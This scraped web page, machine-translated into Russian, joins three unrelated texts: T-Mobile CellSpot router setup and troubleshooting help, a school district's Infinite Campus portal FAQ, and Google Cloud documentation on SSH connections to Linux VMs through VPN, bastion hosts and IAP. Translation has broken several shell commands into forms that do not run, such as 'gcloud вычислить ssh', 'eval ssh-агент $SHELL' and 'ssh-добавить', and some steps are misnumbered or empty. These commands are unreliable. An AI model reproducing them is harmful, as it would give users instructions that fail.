Вам также могут понравиться: на чем основана астрология, страница входа в webex, вход в систему с помощью кредитной карты Washington Trust, вход в веб-почту Windows, онлайн-вход в банк westbury.

Настройка и помощь маршрутизатора Wi-Fi CellSpot

Маршрутизаторы Wi-Fi CellSpot сняты с производства и больше не продаются.  Если вам нужна помощь по настройке Wi-Fi CellSpot Router или проблемам с подключением, мы поможем вам.

Настройка маршрутизатора Wi-Fi CellSpot

Знакомство с маршрутизатором

Маршрутизатор Wi-Fi CellSpot от T-Mobile улучшает сигнал Wi-Fi в вашем доме. Маршрутизатор позволяет использовать вызовы по Wi-Fi для домашних звонков вместо сотовой сети.Звонки имеют приоритет над другими данными Wi-Fi для обеспечения наилучшего качества связи.

Не усиливает сигнал беспроводной сети, но обеспечивает:

  • Более 3000 кв. футов Wi-Fi для звонков дома.
  • Диапазоны 2,4 и 5 ГГц
  • IEEE 802.11a/b/g/n/ac
  • IPv4 и IPv6
  • Безопасность: WEP, WPA-PSK/ENTERPRISE, WPA2-PSK/ENTERPRISE, WPS

  

Интернет-требования

Для поддержки вызовов по Wi-Fi необходим надежный высокоскоростной Интернет.Попробуйте проверить скорость при подключении к домашнему Интернету, чтобы проверить:

  • Скорость загрузки 2 Мбит/с
  • Скорость загрузки 2 Мбит/с

Настройте маршрутизатор

 

Видео по настройке (на английском языке)

 

Видео не загружается? Пожалуйста перезагрузите эту страницу и повторите попытку.

 

Конфигурация видео (испанский)

 

 

Начальные руководства (для печати)

 

 

Подключите телефон к роутеру

  1. Включите Wi-Fi на своем телефоне (если вам нужны шаги, найдите свой телефон на странице «Устройства»).
  2. Выберите одну из сетей T-Mobile Wi-Fi:
    • CellSpot_2.4GHz_[4-значный идентификатор]
    • CellSpot_5GHz_[4-значный идентификатор]
    • (Если имя сети было изменено, вместо этого выберите новое имя сети.)
  3. Введите пароль, указанный на белой наклейке на задней панели маршрутизатора.

  4. Обновите сетевое имя и пароль на своих компьютерах, планшетах и ​​т. д.

 

Изменить имя сети (SSID) или пароль

  1. Убедитесь, что ваш компьютер или телефон подключены к маршрутизатору.
  2. Введите любой URL-адрес в веб-браузере:
  3. Войдите на страницу конфигурации, используя свое имя пользователя и пароль.
    • Логин маршрутизатора по умолчанию — это имя ( admin ) и пароль ( пароль ).
    • Если вы установили свой собственный пароль и забыли его, сбросьте настройки маршрутизатора.
  4. Для обновления SSID и пароля см. шаги ниже.

Имя сети (SSID)

  1. На вкладке «Общие» выберите CellSpot_5GHz_[4-значный идентификатор] и измените его имя.
  2. Обновите предварительный общий ключ WPA до своего предыдущего сетевого пароля.
  3. Выбрать Применить .
  4. Повторно подключите свои устройства к сети Wi-Fi.
  5. Используйте диапазон 2,4 ГГц при подключении существующих устройств (принтеров, камер и т. д.).

Пароль

  1. На странице Network Admin перейдите к разделу System Status карты сети.
  2. Выберите вкладку 2,4 ГГц .
    • В раскрывающемся списке Authentication Method выберите WPA2-Personal .
    • В поле ключа WPA-PSK введите пароль длиной не менее восьми символов.
  3. Выберите вкладку 5 ГГц .
    • В раскрывающемся списке Authentication Method выберите WPA2-Personal .
    • В поле ключа WPA-PSK введите пароль длиной не менее восьми символов. Вы можете использовать тот же пароль, который вы ввели на шаге 4.
  4. Выберите  Применить , и маршрутизатор перезагрузится.
  5. После перезапуска повторно подключитесь, используя новый пароль. Если вы потеряете этот пароль, маршрутизатор необходимо будет сбросить до настроек по умолчанию
  6. .

 

Сброс маршрутизатора

Перезапустите маршрутизатор и модем

Перезагрузите модем и маршрутизатор перед выполнением полного сброса. Это может исправить мелкие проблемы, а также проверить и установить обновления прошивки.

  1. Отключите модем.
  2. Отключите маршрутизатор.
  3. Выключите компьютеры.
  4. Подключите модем и подождите две минуты.
  5. Подключите маршрутизатор и подождите две минуты.
  6. Включите компьютеры.

Сброс маршрутизатора

  1. Нажмите и удерживайте кнопку сброса на задней панели маршрутизатора в течение восьми секунд.
  2. Отпустите кнопку Сброс .
  3. Теперь маршрутизатор сброшен до заводских настроек по умолчанию.

Настройки маршрутизатора по умолчанию

При сбросе маршрутизатора восстанавливаются его настройки по умолчанию, которые перечислены ниже.

  • Имя пользователя: администратор
  • Пароль: пароль
  • Включить DHCP: Да (если подключен кабель WAN)
  • IP-адрес: 192.168.29.1
  • Имя домена: (пусто)
  • Маска подсети: 255.255.255.0
  • DNS-сервер 1: 192.168.29.1
  • DNS-сервер 2: (пусто)
  • SSID (2,4 ГГц): CellSpot_2,4 ГГц_ (четырехзначный MAC-идентификатор)
  • SSID (5 ГГц): CellSpot_5GHz_(четырехзначный MAC-идентификатор)

Если ваше предыдущее сетевое имя отличается от имени по умолчанию, обновите существующие сетевые настройки устройства.

 

Устранение неполадок с маршрутизатором Wi-Fi CellSpot

 

Маршрутизатор не имеет индикаторов

 

  1. Убедитесь, что все кабели правильно подключены и полностью подключены.
  2. Для проверки подключите маршрутизатор к другой розетке.
  3. Убедитесь, что маршрутизатор настроен правильно. Инструкции см. в разделе «Настройка маршрутизатора» выше.

 

Забыли имя пользователя или пароль администратора маршрутизатора

 

 

Не удается получить доступ к страницам администрирования маршрутизатора

 

Если вы не можете получить доступ к администратору маршрутизатора, выполните следующие действия.

  1. Убедитесь, что ваш компьютер или телефон подключены к маршрутизатору.
  2. На компьютере введите любой адрес в адресную строку и откройте страницу:
  3. Войдите на страницу конфигурации, используя свое имя пользователя и пароль. Логин маршрутизатора по умолчанию — это имя ( admin ) и пароль ( пароль ).
    • Если это первый доступ, вам будет предложено изменить пароль. Запишите новое имя пользователя и пароль администратора маршрутизатора, чтобы использовать их позже.Пароли не могут быть восстановлены.
    • Если пароль утерян, выполните сброс маршрутизатора, описанный выше.
  4. Если вы по-прежнему не можете получить доступ к страницам администрирования, свяжитесь с нами.

 

Не удается подключить телефон к маршрутизатору

 

  1. Выключите телефон.
  2. Подождите пять секунд, затем включите телефон.
  3. Попробуйте подключить телефон к роутеру.
  4. Если это не сработало, выполните сброс маршрутизатора, описанный выше. Затем попробуйте переподключиться.
  5. Используйте другой телефон или компьютер, чтобы проверить, могут ли другие устройства подключаться (или подключены) к сети.
  6. Если другие устройства могут подключиться, маршрутизатор исправен. Проблема с устройством, которое не подключается. Проверьте его настройки и руководство пользователя.
  7. Если не удается подключить телефоны или компьютеры, свяжитесь с нами.

 

Не удается подключиться к Интернету

 

  1. Убедитесь, что:
    • Маршрутизатор и модем подключены.
    • Горят индикаторы WAN и LAN.
    • Компьютер или подключенное устройство подключено к правильной сети.
    • Сеть настроена правильно. Для шагов следуйте настройке маршрутизатора выше.
  2. Выключите подключаемое устройство и снова включите его.
  3. Попробуйте выйти в Интернет.
  4. Если у вас все еще есть эта проблема, свяжитесь с нами.
  1. Проверьте следующее:
    • Горит ли синий индикатор (выглядит как шар, пятый справа)?

      • Да: Вы получаете подключение к Интернету через модем.
      • Нет: Маршрутизатор настроен неправильно. См. настройку роутера выше.
    • Есть ли синие индикаторы над 2,4 ГГц или 5 ГГц на передней панели маршрутизатора?
      • Да: Маршрутизатор передает беспроводной сигнал.
      • №: Wi-Fi отключен. Нажмите кнопку включения/выключения Wi-Fi на правой стороне маршрутизатора, чтобы включить его.

  2. Если ответ на оба приведенных выше вопроса положительный, ваш маршрутизатор настроен правильно.(Если нет, перезагрузите модем и маршрутизатор выше.)
  3. Загрузите веб-страницу и посмотрите, увеличилась ли ваша скорость.
    • Скорость Интернета определяется вашим интернет-провайдером (ISP). T-Mobile не предоставляет услугу.
    • Обратитесь к своему Интернет-провайдеру (ISP), чтобы сообщить о медленном Интернете, если проблемы не исчезнут.

 

Нет доступных беспроводных сетей / нет широковещательной передачи Wi-Fi

 

Определите, правильно ли настроена сеть и передается ли беспроводной сигнал от маршрутизатора Wi-Fi CellSpot:

  1. Убедитесь, что маршрутизатор включен.Кнопка Power на задней панели маршрутизатора должна быть нажата.

  2. Горит ли какой-либо из индикаторов маршрутизатора?
    • Да: Перейдите к шагу 5.
    • №: Перейти к следующему шагу.
  3. Если индикаторы не горят, нажмите кнопку включения/выключения светодиодов на задней панели маршрутизатора и подождите пять секунд.
  4. Горит ли синий индикатор (выглядит как глобус, пятый справа)?
  5. Горят ли синие огни над 2.4 ГГц или 5 ГГц иконки?
    • Да: Маршрутизатор передает беспроводной сигнал. Следуйте инструкциям по подключению телефона к маршрутизатору, указанному выше.
    • Нет: Wi-Fi отключен. Нажмите кнопку включения/выключения Wi-Fi на боковой стороне маршрутизатора, чтобы включить Wi-Fi.
  6. Если вы по-прежнему не можете найти свою беспроводную сеть с помощью телефона T-Mobile, свяжитесь с нами.

CCSD 46 — Часто задаваемые вопросы о бесконечном кампусе

ЧАСТО ЗАДАВАЕМЫЕ ВОПРОСЫ ПОРТАЛ БЕСКОНЕЧНОГО КАМПУСА

Портал Infinite Campus Portal позволяет родителям и законным опекунам нынешних учащихся CCSD 46 просматривать записи учащихся, оплачивать сборы, контролировать и загружать счета в сфере общественного питания, а также ежегодно регистрировать учащихся.Ниже приведены часто задаваемые вопросы о портале. Чтобы получить справку по онлайн-регистрации, посетите нашу веб-страницу с часто задаваемыми вопросами о центральной регистрации.

Как получить аккаунт?
Если вы являетесь родителем или законным опекуном текущего учащегося CCSD 46, для вас будет автоматически сгенерирован ключ активации учетной записи. Родители новых учащихся округа получат этот ключ после того, как учащийся пойдет в школу. Для студентов, начинающих в августе, ключи активации будут отправлены домой после Дня труда; для учащихся, начинающих обучение в любое другое время в течение учебного года, обычно это происходит примерно через неделю после их начала.Родители нынешних учащихся, которые еще не активировали свою учетную запись и хотят повторно отправить ключ активации, могут заполнить форму запроса информации об учетной записи на портале. Обратите внимание: наш школьный округ предоставляет учетные записи только родителям и законным опекунам. Если у нас нет документов, подтверждающих право опеки над ребенком, мы не можем предоставить вам учетную запись.

Я забыл свое имя пользователя и/или пароль, как мне получить эту информацию?
Если вы не настроили свой безопасный/восстановительный адрес электронной почты или если вы не получили электронное письмо от портала, заполните форму запроса информации об учетной записи портала.Если вы настроили свой безопасный/восстановительный адрес электронной почты, щелкните ссылки Забыли имя пользователя и Забыли пароль на странице входа на портал.

Я получил ключ активации, как мне настроить свою учетную запись?
Во-первых, при настройке учетной записи настоятельно рекомендуется использовать настольную или браузерную версию Portal, а не приложение. Инструкции по созданию учетной записи см. в документе «Создание учетной записи портала».

Приложение запрашивает название/идентификатор района – что это?
Выберите Иллинойс, а затем выполните поиск Грейслейк.Это поднимет наш район.

Я пытаюсь зарегистрироваться для своих учеников, но не могу найти это в приложении.
В настоящее время онлайн-регистрация доступна только в настольной или браузерной версии портала. Обратите внимание: онлайн-регистрация использует всплывающее окно. Пожалуйста, включите всплывающие окна при онлайн-регистрации!

Что доступно на портале?
Родители могут просматривать оценки учащихся, посещаемость, список предстоящих заданий (только для 5-8 классов, для каждого учителя), информацию об автобусах, оценочные баллы, счет за питание и сборы.Родители также могут общаться с учителями своих учеников, регистрироваться на следующий учебный год, пополнять счета в сфере общественного питания и оплачивать студенческие взносы на портале.

Как я могу оплатить обучение моего ученика в школе?
На портале нажмите «Платежи». У вас будет выбор: сделать разовый платеж или настроить регулярные платежи.

Как я могу просмотреть покупки моего учащегося в сфере общественного питания?
На портале нажмите на Food Service.Вы увидите подробный список покупок, сделанных вашим учеником, а также любые депозиты.


Обратите внимание: блюда a la carte можно приобрести только в GMS и Park.

Подключение к виртуальным машинам Linux с использованием расширенных методов  | Документация по вычислительному движку  | Облако Google

линукс


Как правило, лучшие способы подключения SSH описаны в Подключение к экземплярам документ.Однако, когда вам нужно управлять своими учетными данными, используйте сторонние инструменты или подключение с использованием альтернативных путей подключения, следующие расширенные методы могут лучше соответствовать вашим потребностям, чем стандартные методы. За информация о том, как работают соединения SSH в Compute Engine, включая SSH ключ конфигурации и хранения, см. SSH-подключения к виртуальным машинам Linux.

Существует несколько расширенных методов, которые можно использовать для подключения к виртуальным машинам Linux:

Прежде чем начать

Поддерживаемые операционные системы

Эти методы подключения поддерживаются для всех операционных систем Linux, доступны на Compute Engine.Для Федоры CoreOS, вы должны настроить SSH-доступ прежде чем вы сможете использовать эти методы.

Предоставление открытых ключей SSH экземплярам

Обычно Compute Engine создает ключи SSH и управляет ими всякий раз, когда вы подключиться способами, описанными в Подключение к экземплярам.

Однако, если вам нужно использовать собственные SSH-ключи (например, при использовании сторонние инструменты для подключения), вы должны создать свою собственную пару ключей SSH и предоставьте инстансу файл с открытым ключом SSH до того, как вы сможете соединять.

Если вы не знаете, как создать собственный ключ SSH, см. Создайте SSH-ключи.

Чтобы предоставить свой SSH-ключ экземпляру, используйте один из следующих способов:

  • (рекомендуется) Включить вход в ОС. Вход в ОС использует роли IAM для предоставления открытый SSH-ключ к экземпляру через вашу учетную запись Google или управляемый учетная запись пользователя. Инструкции см. Настройка входа в ОС.

    При настройке входа в ОС обязательно выполните шаг Добавьте ключи к виртуальным машинам, использующим вход в ОС.На этом шаге вы можете добавить свой открытый ключ к учетной записи пользователя, которую вы хотите используйте для подключения к вашей виртуальной машине.

    Чтобы узнать больше о преимуществах использования этой функции, см. Вход в ОС.

  • (не рекомендуется) Добавление и удаление ключей SSH вручную путем редактирования метаданные проекта или экземпляра. Видеть Управление ключами SSH в метаданных. Этот метод добавляет ненужные риски и сложности и не рекомендуется если описанный выше метод входа в ОС не работает для вас. Видеть Риски ручного управления ключами.

  • Если вашим экземпляром управляет кто-то, у кого уже есть доступ (например, системного администратора в вашей организации), вы также можете указать свой общедоступный файл ключа SSH и попросите их вручную настроить его для вас. Обычно это включает в себя их подключение к вашему экземпляру, копирование вашего файла открытого ключа в ваш домашний каталог на вашем экземпляре и изменение разрешений на файл, но это зависит от того, как ваша организация управляет вашими экземплярами.

Чтобы подключиться, выполните действия для операционной системы на вашем локальном компьютере. рабочая станция:

Linux, macOS и Windows 10 или более поздней версии

Чтобы подключиться с помощью SSH с компьютера Linux или macOS, используйте встроенный ssh команда в локальном терминале:

  1. Если вы еще этого не сделали, предоставьте свой открытый SSH-ключ экземпляру, используя один из доступные варианты.Вы не можете продолжить без этого.

  2. В Google Cloud Console перейдите на страницу VM Instances и найдите внешний IP-адрес для экземпляра, который вы хотите подключить к.

    Перейти к экземплярам ВМ

  3. В локальном терминале используйте команду ssh вместе с вашим личным SSH ключевой файл, имя пользователя и внешний IP-адрес экземпляра для соединять. Например:

    ssh -i  ПУТЬ_К_ЧАСТНОМУ_КЛЮЧУ   ИМЯ ПОЛЬЗОВАТЕЛЯ  @  ВНЕШНИЙ_IP 
     

    Заменить следующее:

    • PATH_TO_PRIVATE_KEY : путь к вашему приватному файлу ключа SSH.
    • USERNAME : имя пользователя подключающегося к экземпляру. Если вы управляете ключами SSH в метаданных, имя пользователя это то, что вы указали, когда вы создал ключ SSH. Для учетных записей входа в ОС, имя пользователя указано в вашем профиле Google. Например, [email protected] или cloudysanfrancisco .
    • EXTERNAL_IP : Внешний IP-адрес для ваш экземпляр.

    После подключения запустите команды на своем экземпляре с помощью этого терминала.Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Windows 8 и более ранние версии (PuTTY)

Windows 8 и более ранние версии не включают встроенный SSH-клиент, что означает, что вы необходимо скачать и установить сторонний клиент. Следующие инструкции показать, как подключиться с помощью PuTTY.

Чтобы подключиться к экземпляру из Windows, используя PuTTY, сделайте следующее:

  1. Если вы еще этого не сделали, предоставьте свой открытый SSH-ключ экземпляру, используя один из доступные варианты.Вы не можете продолжить без этого.

  2. В Google Cloud Console перейдите на страницу VM Instances и найдите внешний IP-адрес экземпляра, к которому вы хотите подключиться. Держать внешний IP-адрес, доступный для последующих шагов.

    Перейти к экземплярам ВМ

  3. Скачать putty.exe , если вы еще этого не сделали.

  4. Откройте PuTTY, запустив putty.exe . Окно настройки подключения открывается.

  5. В поле Host Name введите имя пользователя, связанное с SSH ключ и внешний IP-адрес экземпляра, который вы хотите присоединиться. Используйте следующий формат:

      ИМЯ ПОЛЬЗОВАТЕЛЯ  @  ВНЕШНИЙ_IP  

    Заменить следующее:

    • USERNAME : имя пользователя подключающегося к экземпляру. Это должно быть имя пользователя, указанное вами при создал ключ SSH. Например, [email protected] или cloudysanfrancisco .
    • EXTERNAL_IP : внешний IP-адрес экземпляр, к которому вы хотите подключиться.

    Например, см. следующий снимок экрана:

  6. В меню Категория перейдите к Соединение > SSH > Аутентификация .

  7. В поле Файл закрытого ключа для аутентификации перейдите к расположение вашего файла закрытого ключа.

    Например, см. следующий снимок экрана:

  8. Щелкните Открыть , чтобы открыть терминал с подключением к вашему экземпляру.

После подключения запустите команды на своем экземпляре с помощью этого терминала. Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Chrome OS (приложение SSH)

Chromebook или операционные системы с установленной поддержкой Chrome Безопасная оболочка как SSH-клиент.Чтобы подключиться к экземплярам из приложения Secure Shell, выполните следующее:

  1. Если вы еще этого не сделали, предоставьте свой открытый SSH-ключ экземпляру, используя один из доступные варианты. Вы не можете продолжить без этого.

  2. Установить Безопасная оболочка на вашем Chromebook или браузере Chrome, если вы этого не сделали уже.

  3. В Google Cloud Console перейдите на страницу VM Instances и найдите внешний IP-адрес экземпляра, к которому вы хотите подключиться.Держать внешний IP-адрес, доступный для последующих шагов.

    Перейти к экземплярам ВМ

  4. Откройте приложение Secure Shell на вкладке браузера Chrome. Вы можете получить доступ к Chrome приложения, набрав chrome://apps в адресной строке.

  5. Введите имя пользователя, связанное с парой ключей SSH и внешним IP-адресом адрес экземпляра, к которому вы хотите подключиться. Используйте следующее формат:

       ИМЯ ПОЛЬЗОВАТЕЛЯ  @  ВНЕШНИЙ_IP 
      

    Заменить следующее:

    • USERNAME : имя пользователя, который подключение к экземпляру.Это должно быть имя пользователя, которое вы указали когда ты создал ключ SSH. Например, [email protected] или cloudysanfrancisco .
    • EXTERNAL_IP : внешний IP-адрес экземпляр, к которому вы хотите подключиться.
  6. В поле Identity выберите файл закрытого ключа SSH, вы хотите использовать для подключения к экземпляру. При необходимости нажмите Импортируйте , чтобы выбрать файл закрытого ключа с вашей локальной рабочей станции.

  7. Нажмите Подключить , чтобы подключиться к экземпляру.

После подключения запустите команды на своем экземпляре с помощью этого терминала. Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

В дополнение к параметрам, описанным выше, другие варианты подключения к экземпляр, использующий SSH, включает:

Подключение к экземплярам, ​​не имеющим внешних IP-адресов

Если у вас есть изолированные экземпляры, у которых нет внешнего IP-адреса, вы по-прежнему можете подключаться к этим экземплярам, ​​используя их внутренний IP-адрес. адреса в сети Google Cloud VPC.Например, вы по-прежнему можете подключаться к виртуальным машинам, которые намеренно изолируете от других. внешние сети, используя следующие методы:

Важно: Чтобы эти методы работали, ваша сеть VPC должна иметь одно или несколько правил брандмауэра, разрешающих SSH соединения на порту 22 . Правила брандмауэра должны разрешать SSH-соединения. для диапазонов IP-адресов или конкретных IP-адресов, с которых вы хотите подключиться.

Подключение через VPN-подключение

Чтобы использовать Виртуальная частная сеть (VPN) для подключения к экземпляру без внешнего IP-адреса:

  • Необходимо использовать компьютер, который может подключиться к экземпляру ВМ через Облачный VPN-туннель.

    Например, у вас может быть VPN, совместно используемая вашей локальной локальной сетью. с вашим Google Cloud VPC. В такой ситуации подключитесь к экземпляр с помощью Google Cloud CLI, SSH в Linux или macOS или сторонние клиенты SSH, такие как PuTTY в Windows.

Подробнее см. следующие вкладки:

gcloud

Чтобы подключиться к экземпляру без внешнего IP-адреса, используйте gcloud вычислить команду ssh с флаг --internal-ip .

  1. В Google Cloud Console перейдите на страницу VM Instances и найдите внутренний IP-адрес экземпляра, к которому вы хотите подключиться.

    Перейти к экземплярам ВМ

  2. Подключитесь к экземпляру.

    gcloud вычислить ssh  INTERNAL_INSTANCE_NAME  \
        --zone=  ЗОНА  \
        --internal-ip
     

    Заменить следующее:

    • INTERNAL_INSTANCE_NAME : имя экземпляр, который вы хотите подключить к
    • ЗОНА : название зоны, в которой экземпляр расположен
  3. После подключения запустите команды на своем экземпляре с помощью этого терминала.Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Linux и macOS

Для подключения к экземпляру без внешнего IP-адреса из Linux или macOS рабочих станций выполните следующие действия:

  1. Предоставьте свой открытый SSH-ключ экземпляру, используя один из доступные варианты. Вы не можете продолжить без этого.

  2. На локальном компьютере запустите ssh-agent для управления ключами SSH для ты:

    eval ssh-агент $SHELL
     
  3. Используйте команду ssh-add для загрузки личного ключа SSH с локального компьютер в агент и используйте свой закрытый SSH-ключ для аутентификации всех SSH-команд.Замените PRIVATE_KEY на имя файла вашего закрытого ключа.

    ssh-добавить ~/.ssh/  PRIVATE_KEY 
     
  4. В Google Cloud Console перейдите на страницу VM Instances и найдите внутренний IP-адрес экземпляра, к которому вы хотите подключиться.

    Перейти к экземплярам ВМ

  5. В локальном терминале используйте команду ssh вместе с именем пользователя связанный с вашим закрытым SSH-ключом и внутренним IP-адресом экземпляр для подключения.Например:

    ssh  ИМЯ ПОЛЬЗОВАТЕЛЯ  @  ВНУТРЕННИЙ_ЭКЗЕМПЛЯР_IP_АДРЕС  

    Заменить следующее:

    • USERNAME : имя пользователя, который подключение к экземпляру. Это должно быть имя пользователя, которое вы указали когда ты создал ключ SSH.
    • INTERNAL_INSTANCE_IP_ADDRESS : внутренний IP адрес экземпляра, к которому вы хотите подключиться.

После подключения запустите команды на своем экземпляре с помощью этого терминала.Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Windows (PuTTY)

Для подключения к экземпляру без внешнего IP-адреса из Windows рабочие станции:

  1. Если вы еще этого не сделали, предоставьте свой открытый SSH-ключ экземпляру, используя один из доступные варианты. Вы не можете продолжить без этого.

  2. В Google Cloud Console перейдите на страницу VM Instances и найдите внутренний IP-адрес экземпляра, к которому вы хотите подключиться.

    Перейти к экземплярам ВМ

  3. Выполните предыдущие шаги, чтобы подключиться к экземпляру с помощью PuTTY из Windows, но внесите следующее изменение:

    • Если шаги предписывают указать внешний IP-адрес, вместо этого укажите внутренний адрес экземпляра, который вы хотите подключиться к.

После подключения запустите команды на своем экземпляре с помощью этого терминала. Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Подключение через хост-бастион

Другой способ подключения к экземпляру, не имеющему внешнего IP адрес для подключения через бастионный хозяин. Использование бастионного хоста также позволяет подключаться к экземплярам на других пиринговые сети VPC.

Чтобы подключиться к экземпляру через хост-бастион из Linux и macOS, используйте либо Google Cloud CLI, либо SSH. Для подключения из Windows, используйте сторонний SSH-клиент, например PuTTY.

Для подключения к другим экземплярам с узла-бастиона требуется закрытый ключ SSH.Есть несколько способов справиться с этим:

  • Установите интерфейс командной строки Google Cloud и настройте его для управления закрытыми ключами для ты.
  • Перенаправьте свой закрытый ключ на экземпляр хоста-бастиона, включив агент пересылка в вашем ssh-клиенте.
Примечание: Ниже приведены примеры узла-бастиона на Операционная система Линукс. Если вы хотите продолжить, подтвердите, что бастион хост, который вы используете, работает под управлением Linux.

Полные шаги см. в следующих примерах:

gcloud

Бета — SSH на внутренние IP-адреса с использованием Облачный интерфейс командной строки Google

На эту функцию распространяются условия предложений Pre-GA. Условия использования Google Cloud.Функции Pre-GA могут иметь ограниченную поддержку, и изменения в функциях до GA могут быть несовместимы с другими версиями до GA. Для получения дополнительной информации см. описания этапов запуска.

Интерфейс командной строки Google Cloud позволяет подключаться к экземплярам, ​​у которых нет внешних IP-адреса без пересылки ваших личных SSH-ключей на хост-бастион. Для этого установите gcloud как на локальную рабочую станцию, так и на бастион. хост-экземпляр, если вы еще этого не сделали.

Примечание: Если у вас есть обстоятельства, требующие пересылки ваших закрытых ключей вместо того, чтобы разрешить интерфейсу командной строки gcloud управлять ими за вас, см. на вкладках Linux или macOS и Windows и найдите инструкции по используя ssh-agent для пересылки вашего ключа. После того, как вы используете ssh-agent для пересылки ваш ключ, вернитесь к этой процедуре и используйте gcloud Compute SSH для подключения.

Чтобы использовать интерфейс командной строки Google Cloud для подключения к экземпляру, который не имеет внешнего IP-адреса:

  1. Установите область доступа для чтения и записи API Compute Engine для учетной записи службы на ваш бастионный хост-экземпляр, включив --scopes вычисление-rw в ваш команда.Для получения дополнительной информации см. Изменение учетной записи службы и областей доступа для экземпляра.

  2. Предоставьте необходимые разрешения IAM, чтобы разрешить вашему хосту-бастиону доступ ваш открытый SSH-ключ, используя вход в ОС (рекомендуется) или проект метаданные. Используйте одну из следующих процедур:

    Учетная запись службы на вашем хосте-бастионе теперь может применять ваш общедоступный SSH ключ.

  3. Подключитесь к экземпляру хоста-бастиона Linux. Заменять EXTERNAL_INSTANCE_NAME с именем экземпляр узла бастиона, который вы используете для получения доступа к внутреннему сеть.

    gcloud вычисляет ssh  EXTERNAL_INSTANCE_NAME 
     
  4. Из экземпляра хоста-бастиона Linux используйте команда gcloud вычислить ssh с флагом --internal-ip для подключения к экземплярам, ​​используя их внутренние IP-адреса.

    gcloud вычислить ssh  INTERNAL_INSTANCE_NAME  --internal-ip
     

    Замените INTERNAL_INSTANCE_NAME именем экземпляр, к которому вы хотите подключиться.

После подключения запустите команды на своем экземпляре с помощью этого терминала. Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Linux и macOS

Если вам нужно перенаправить закрытые ключи на экземпляр хоста-бастиона, вы должны добавьте свои ключи в ssh-agent . Затем используйте либо вычислений gcloud ssh или команду ssh , чтобы установить начальное соединение с bastion host и перенаправьте ключи в агенте SSH.Этот процесс работает только на рабочих станциях Linux и macOS. Если вам нужно перенаправить закрытые ключи на бастион с рабочей станции Windows , следуйте инструкциям PuTTY вместо.

Для подключения к экземпляру без внешнего IP-адреса из Linux или рабочие станции macOS:

  1. Предоставьте свой открытый ключ SSH, используя один из доступных опции. Убедитесь, что вы предоставили этот открытый SSH-ключ как для Linux, экземпляр хоста-бастиона и экземпляр без внешнего IP-адреса.

  2. На локальном компьютере запустите ssh-agent для управления ключами SSH для ты:

    eval ssh-агент $SHELL
     
  3. Используйте команду ssh-add для загрузки личного ключа SSH с локального компьютер в агент. После добавления команды SSH автоматически используют файл закрытого ключа SSH для аутентификации.

    $ ssh-добавить ~/.ssh/  PRIVATE_KEY 
     

    Замените PRIVATE_KEY на имя вашего файл закрытого ключа.

  4. В Google Cloud Console перейдите на страницу VM Instances . в Внешний IP столбец, найдите внешний IP адрес Linux бастионный хост-экземпляр. И в графе Internal IP найдите внутренний IP-адрес внутреннего экземпляра, к которому вы хотите подключиться к.

    Перейти к экземплярам ВМ

  5. Подключитесь к хост-экземпляру бастиона Linux, используя ssh или gcloud вычисляет ssh .Для любого варианта включите аргумент -A . для включения переадресации агента аутентификации.

    Подключитесь к хост-экземпляру бастиона Linux и перешлите свои закрытые ключи с ssh :

    ssh -A  ИМЯ ПОЛЬЗОВАТЕЛЯ  @  BASTION_HOST_EXTERNAL_IP  

    Заменить следующее:

    • USERNAME : имя, прикрепленное к вашему ключу SSH.
    • BASTION_HOST_EXTERNAL_IP : внешний IP адрес экземпляра хоста-бастиона, который вы используете для получения доступ к внутренней сети.

    Кроме того, вы можете подключиться к экземпляру хоста-бастиона и перенаправьте свои закрытые ключи с помощью команды gcloud Compute ssh . Эта опция позволяет вам подключиться к экземпляру хоста-бастиона, используя Google Cloud CLI, а затем используйте обычный ssh с переадресованным учетные данные при подключении к внутренним IP-адресам.

    gcloud вычислить ssh --ssh-flag="-A"  BASTION_HOST_INSTANCE_NAME 
     

    Замените BASTION_HOST_INSTANCE_NAME именем экземпляра хоста-бастиона, который вы используете для получения доступа к вашему внутренняя сеть.

  6. Из экземпляра узла-бастиона Linux используйте SSH для подключения к экземпляру у которого нет внешнего IP-адреса:

    ssh  ИМЯ ПОЛЬЗОВАТЕЛЯ  @  ВНУТРЕННИЙ_ЭКЗЕМПЛЯР_IP_АДРЕС  

    Заменить следующее:

    • USERNAME : имя, прикрепленное к вашему ключу SSH.
    • INTERNAL_INSTANCE_IP_ADDRESS : внутренний IP адрес экземпляра, к которому вы хотите подключиться.

После подключения запустите команды на своем экземпляре с помощью этого терминала. Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Windows

Для подключения к экземпляру без внешнего IP-адреса из Windows рабочие станции:

  1. Предоставьте свой открытый ключ SSH, используя один из доступных опции. Убедитесь, что вы предоставили этот открытый SSH-ключ как для Linux, экземпляр хоста-бастиона и экземпляр без внешнего IP-адреса.

  2. В Google Cloud Console перейдите на страницу VM Instances . в Внешний IP столбец, найдите внешний IP адрес Linux бастионный хост-экземпляр. И в графе Internal IP найдите внутренний IP-адрес внутреннего экземпляра, к которому вы хотите подключиться к.

    Перейти к экземплярам ВМ

  3. Подключитесь к экземпляру хоста-бастиона Linux с помощью PuTTY. Чтобы передать свой закрытый SSH-ключ хосту-бастиону, включите Разрешить переадресацию агента , как показано на следующем снимке экрана:

  4. Из экземпляра узла-бастиона Linux используйте SSH для подключения к экземпляру у которого нет внешнего IP-адреса:

    ssh  ИМЯ ПОЛЬЗОВАТЕЛЯ  @  ВНУТРЕННИЙ_IP_АДРЕС 
     

    Заменить следующее:

    • USERNAME : имя пользователя подключающегося к экземпляру.Это должно быть имя пользователя, указанное вами при создал ключ SSH.
    • INTERNAL_IP_ADDRESS : внутренний IP-адрес экземпляра, к которому вы хотите подключиться.

    После подключения запустите команды на своем экземпляре с помощью этого терминала. Когда вы закончите, отключитесь от экземпляра, запустив выход команда.

Подключение через прокси-сервер с идентификацией (IAP) для TCP

Вы можете включить Переадресация IAP TCP установить зашифрованный туннель, по которому вы можете перенаправлять SSH-соединения к ВМ.

Чтобы включить переадресацию IAP TCP для виртуальных машин, выполните следующие действия:

  1. Создать правило брандмауэра для включения подключений из IAP.
  2. Предоставьте необходимые разрешения IAM чтобы включить переадресацию IAP TCP.

Чтобы подключиться к виртуальным машинам с включенной переадресацией IAP TCP, туннельные SSH-соединения.

Подключение к экземплярам в качестве пользователя root

